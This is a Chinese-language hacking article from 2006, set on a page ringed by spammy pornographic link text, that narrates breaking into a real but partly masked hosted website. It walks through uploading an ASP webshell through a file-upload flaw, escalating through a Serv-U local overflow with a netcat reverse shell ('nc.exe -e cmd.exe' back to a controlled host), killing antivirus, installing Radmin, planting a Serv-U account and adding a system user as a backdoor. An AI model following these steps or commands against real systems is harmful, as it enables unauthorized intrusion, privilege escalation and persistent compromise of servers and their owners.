国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

Webshell是如何繞過防火墻提升權(quán)限的?
2006-11-09   

本文講的重點是webshell權(quán)限的提升和繞過防火墻,高手勿笑。

廢話少說,咱們進入正題。

首先確定一下目標:http://www.sun***.com ,常見的虛擬主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell,不是DVBBS,而是自由動力3.6的軟件上傳過濾不嚴。網(wǎng)站http://www.sun***.com/lemon/Index.asp是自由動力3.6文章系統(tǒng)。Xr運用WinHex.exe和WSockExpert.exe上傳一個網(wǎng)頁木馬newmm.asp,用過動鯊的door.exe的人都知道,這個是上傳asp木馬內(nèi)容的。于是,上傳海洋2005a,成功獲得webshell。

測試一下權(quán)限,在cmd里運行set,獲得主機一些信息,系統(tǒng)盤是D盤,也說明了我們的webshell有運行權(quán)限的。那我們看看C盤有什么呢?難道是雙系統(tǒng)?瀏覽后發(fā)現(xiàn)沒有什么系統(tǒng)文件,只有一些垃圾文件。沒關(guān)系,再來檢查一下,虛擬主機都有serv-u的,這臺也不例外,是5.0.0.8的。

思路:上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統(tǒng)shell。大家是不是發(fā)現(xiàn)海洋2005a那個上傳的組件不好用,沒關(guān)系,用rain改的一個無組件上傳,一共有3個文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾,up.htm是本地用的,修改up.htm里的鏈接地址為:http://www.sun***.com/lemon/upload.asp就可以上傳了。

傳上了srv.exe和nc.exe在H:\long\sun***\lemon(網(wǎng)站目錄)后,發(fā)現(xiàn)沒有運行權(quán)限。沒關(guān)系,根據(jù)經(jīng)驗,一般系統(tǒng)下D:\Documents and Settings\All Users\是應(yīng)該有運行權(quán)限的。于是想把文件copy過去,但是發(fā)現(xiàn)我們的webshell沒有對D盤寫的權(quán)限。

可以瀏覽D:\program files\serv-u\ServUDaemon.ini,不能改,難道要破解serv-u的密碼,不想。

不可以這么就泄氣了,我突然想到為什么系統(tǒng)不放在C盤了,難道C盤是FAT32分區(qū)的?這里說一下,如果主機有win98的系統(tǒng)盤,那里99%是FAT32分區(qū)的。我們還遇到過裝有Ghost的主機,為了方便在DOS下備份,它的備份盤一般都是FAT分區(qū)的。如果系統(tǒng)盤是FAT32分區(qū),則網(wǎng)站就沒有什么安全性可言了。雖然C盤不是系統(tǒng)盤,但是我們有執(zhí)行權(quán)限。呵呵,copy srv.exe和nc.exe到c:\,運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這里的202.*.*.*是我們的肉雞,在這之前我們已經(jīng)運行了nc –l –p 888。

我們成功獲得一個系統(tǒng)shell連上。(看起來簡單,其實這里我們也遇到過挫折,我們發(fā)現(xiàn)有些版本的nc居然沒有-e這個參數(shù),還以為全世界nc功能都一樣。后來又發(fā)現(xiàn)不同版本的nc互連不成功,會出現(xiàn)亂碼,沒辦法用。為此,上傳n次,錯誤n次,傻了n次,后來終于成功了。做黑客還真得有耐心和恒心。)

高興之余,我們?nèi)圆粷M足,因為這個shell實在是太慢了。于是,想用我們最常用的Radmin,其實管理員一按Alt+Ctrl+Del,看進程就能發(fā)現(xiàn)r_server了,但是還是喜歡用它,是因為不會被查殺。好了,上傳admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用剛才nc得到的shell把它們copy到d:\winnt\system32\下,分別運行:r_server /install , net start r_server , r_server /pass:rain /save 。

一陣漫長的等待,終于顯示成功了。興沖沖用radmin連上去,發(fā)現(xiàn)連接失敗。呵呵,忘了有防火墻了。上傳pslist和pskill上去,發(fā)現(xiàn)有backice,木馬克星等。Kill掉他們雖然可以登陸,但服務(wù)器重啟后還是不行,終不是長久之計呀。防火墻是不防21,80等端口的,于是,我們的思路又回到了serv-u上了。把他的ServUDaemon.ini下載下來,覆蓋本機的ServUDaemon.ini,在本機的serv-u上添加一個用戶名為xr,密碼為rain的系統(tǒng)帳號,加上所有權(quán)限。再用老辦法,上傳,用shell寫入D:\program files\serv-u\里,覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間,但是成功了,于是用flashfxp連上,發(fā)生530錯誤。郁悶,怎么又失敗了。(根據(jù)經(jīng)驗這樣應(yīng)該就可以了,但為什么不行沒有想通,請高手指點。)

不管了,我們重啟serv-u就ok了,怎么重啟呢,開始想用shutdown重啟系統(tǒng),但那樣我們就失去了nc這個shell,還可能被發(fā)現(xiàn)。后來,眼睛一亮,我們不是有pskill嗎?剛才用pslist發(fā)現(xiàn)有這個進程:ServUDaemon 。把它kill了。然后再運行D:\program files\serv-u\ ServUAdmin.exe ,這里要注意不是ServUDaemon.exe 。

好了,到這里,我們直接ftp上去吧,ls一下,哈哈,系統(tǒng)盤在我的掌握下。我們能不能運行系統(tǒng)命令呢?是可以的,這樣就可以:

ftp>quote site exec net user xr rain /add

在webshell上運行net user,就可以看見添加成功了。

整個入侵滲透到這就結(jié)束了,在一陣后清理打掃后。我們就開始討論了。其實,突破防火墻有很多好的rootkit可以做到的,但是我們覺得系統(tǒng)自帶的服務(wù)才是最安全的后門。

(t113)

熱詞搜索:

上一篇:讓防火墻順從我們想象中的意圖來工作
下一篇:沒有防火墻的安全:明智還是愚蠢?

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
久久99国产精品麻豆| 99久久免费精品| 日韩一区二区三| 一本久久综合亚洲鲁鲁五月天| 美腿丝袜在线亚洲一区| 午夜电影网亚洲视频| 亚洲人123区| 中文字幕乱码一区二区免费| 精品国产91乱码一区二区三区| 一片黄亚洲嫩模| 日本韩国一区二区三区| 国产精品一区二区果冻传媒| 久久精品国产色蜜蜜麻豆| 视频一区中文字幕| 天天做天天摸天天爽国产一区 | 国产精品中文字幕日韩精品 | 欧美一二三区精品| 这里只有精品视频在线观看| 欧美剧情片在线观看| 国产丝袜在线精品| 久久蜜臀中文字幕| 欧美激情一区三区| 亚洲男人的天堂在线aⅴ视频 | 亚洲天天做日日做天天谢日日欢| 欧美极品美女视频| 国产盗摄女厕一区二区三区| 国产精品美女www爽爽爽| 久久国内精品视频| 欧美在线free| 久久99国产精品久久99果冻传媒| 欧美va亚洲va| 亚洲国产成人porn| 欧美一区二区在线观看| 丝袜诱惑制服诱惑色一区在线观看| 开心九九激情九九欧美日韩精美视频电影 | k8久久久一区二区三区| 捆绑紧缚一区二区三区视频| 成人免费观看视频| 久久人人超碰精品| 国产在线精品免费| 国产欧美视频一区二区三区| 中文字幕一区二区三区四区| 国产一区二区不卡| 日本一区二区三区国色天香| 国产成人综合亚洲91猫咪| 成人高清伦理免费影院在线观看| 色婷婷综合久色| 日韩欧美激情在线| 亚洲欧美日韩国产手机在线| 蜜桃视频在线观看一区二区| 91麻豆成人久久精品二区三区| 日韩午夜精品视频| 亚洲欧美国产三级| 亚洲欧美国产毛片在线| 国产原创一区二区| 3d动漫精品啪啪一区二区竹菊| 2019国产精品| 日韩av不卡在线观看| 91在线精品一区二区三区| 日韩午夜av一区| 亚洲美女视频在线观看| 成人黄色av网站在线| 精品欧美乱码久久久久久1区2区| 艳妇臀荡乳欲伦亚洲一区| 成人h动漫精品一区二| 久久综合99re88久久爱| 美女爽到高潮91| 欧美日韩综合一区| 中文字幕一区二区三区精华液| 久久99久久99精品免视看婷婷| 欧美久久久影院| 亚洲午夜电影在线| 91免费视频网| 国产精品二三区| 风间由美性色一区二区三区| 26uuu亚洲婷婷狠狠天堂| 美女www一区二区| 欧美一级日韩免费不卡| 亚洲gay无套男同| 欧美亚洲综合一区| 亚洲一区精品在线| 欧美日韩午夜精品| 五月天精品一区二区三区| 欧美日韩在线观看一区二区 | 日本一区二区综合亚洲| 九一久久久久久| 精品福利二区三区| 日韩黄色免费网站| 91精品国产综合久久久蜜臀粉嫩| 亚洲午夜精品久久久久久久久| 欧美色图天堂网| 亚洲大尺度视频在线观看| 欧美午夜精品久久久久久孕妇| 一二三区精品视频| 欧美日韩不卡在线| 热久久久久久久| 久久久亚洲国产美女国产盗摄 | 最新日韩av在线| 99re这里都是精品| 洋洋av久久久久久久一区| 欧美日韩亚州综合| 精品在线免费视频| 亚洲国产精品t66y| 欧美最猛黑人xxxxx猛交| 日韩成人午夜精品| 亚洲精品一区在线观看| 风间由美一区二区三区在线观看| 亚洲欧美日本韩国| 666欧美在线视频| 国产成人午夜视频| 亚洲尤物视频在线| 精品蜜桃在线看| 成人美女在线视频| 午夜精品久久久久久久久久久| 日韩欧美的一区| 波多野结衣91| 丝袜诱惑制服诱惑色一区在线观看 | 免费看黄色91| 中文字幕成人av| 欧美视频在线观看一区二区| 精品制服美女久久| 亚洲精品国久久99热| 日韩一级在线观看| 99久久99久久久精品齐齐| 青青草97国产精品免费观看无弹窗版 | 亚洲婷婷综合久久一本伊一区| 这里只有精品免费| 成人天堂资源www在线| 日日夜夜精品视频天天综合网| 欧美国产丝袜视频| 91精品国产综合久久福利 | thepron国产精品| 日韩不卡手机在线v区| 国产精品欧美经典| 日韩一级黄色片| 在线免费观看视频一区| 久久99最新地址| 亚洲高清视频中文字幕| 中文字幕一区二区在线观看| 69堂国产成人免费视频| 色综合久久中文综合久久97 | 一区二区三区中文字幕| 国产欧美日韩中文久久| 欧美一区二区三区日韩视频| 97久久超碰精品国产| 国产麻豆成人精品| 视频在线观看国产精品| 亚洲综合色婷婷| 国产精品免费aⅴ片在线观看| 欧美一区二区三区免费大片| 一本一道综合狠狠老| 成人亚洲一区二区一| 国产美女娇喘av呻吟久久| 麻豆成人久久精品二区三区红| 午夜久久久影院| 亚洲一区二区黄色| 一区二区三区四区国产精品| 国产精品午夜久久| 欧美激情自拍偷拍| 久久精品一区蜜桃臀影院| 337p日本欧洲亚洲大胆色噜噜| 欧美一区二区在线看| 91麻豆精品国产无毒不卡在线观看| 一本大道久久精品懂色aⅴ| 一本色道久久综合亚洲精品按摩| 不卡区在线中文字幕| 99亚偷拍自图区亚洲| 99精品视频免费在线观看| 成人美女视频在线观看18| 成人午夜电影久久影院| 成人av资源下载| 一本大道av一区二区在线播放 | 在线中文字幕不卡| 色菇凉天天综合网| 91免费观看国产| 在线视频一区二区免费| 欧美性受xxxx黑人xyx| 欧美三级视频在线播放| 欧美一区二区三区男人的天堂| 精品少妇一区二区三区免费观看| 欧美mv日韩mv国产网站app| 久久久国产精华| 国产精品久久久久久久午夜片 | 国产精品久久网站| 一区二区三区加勒比av| 性久久久久久久| 国内一区二区在线| 不卡的av中国片| 在线观看视频一区二区| 欧美日韩精品欧美日韩精品一| 日韩久久久久久| 国产精品乱码一区二三区小蝌蚪| 亚洲免费成人av| 日韩成人伦理电影在线观看| 激情深爱一区二区| 91在线精品一区二区| 日韩一二三区不卡| 亚洲天堂久久久久久久| 日产欧产美韩系列久久99| 国产成a人亚洲|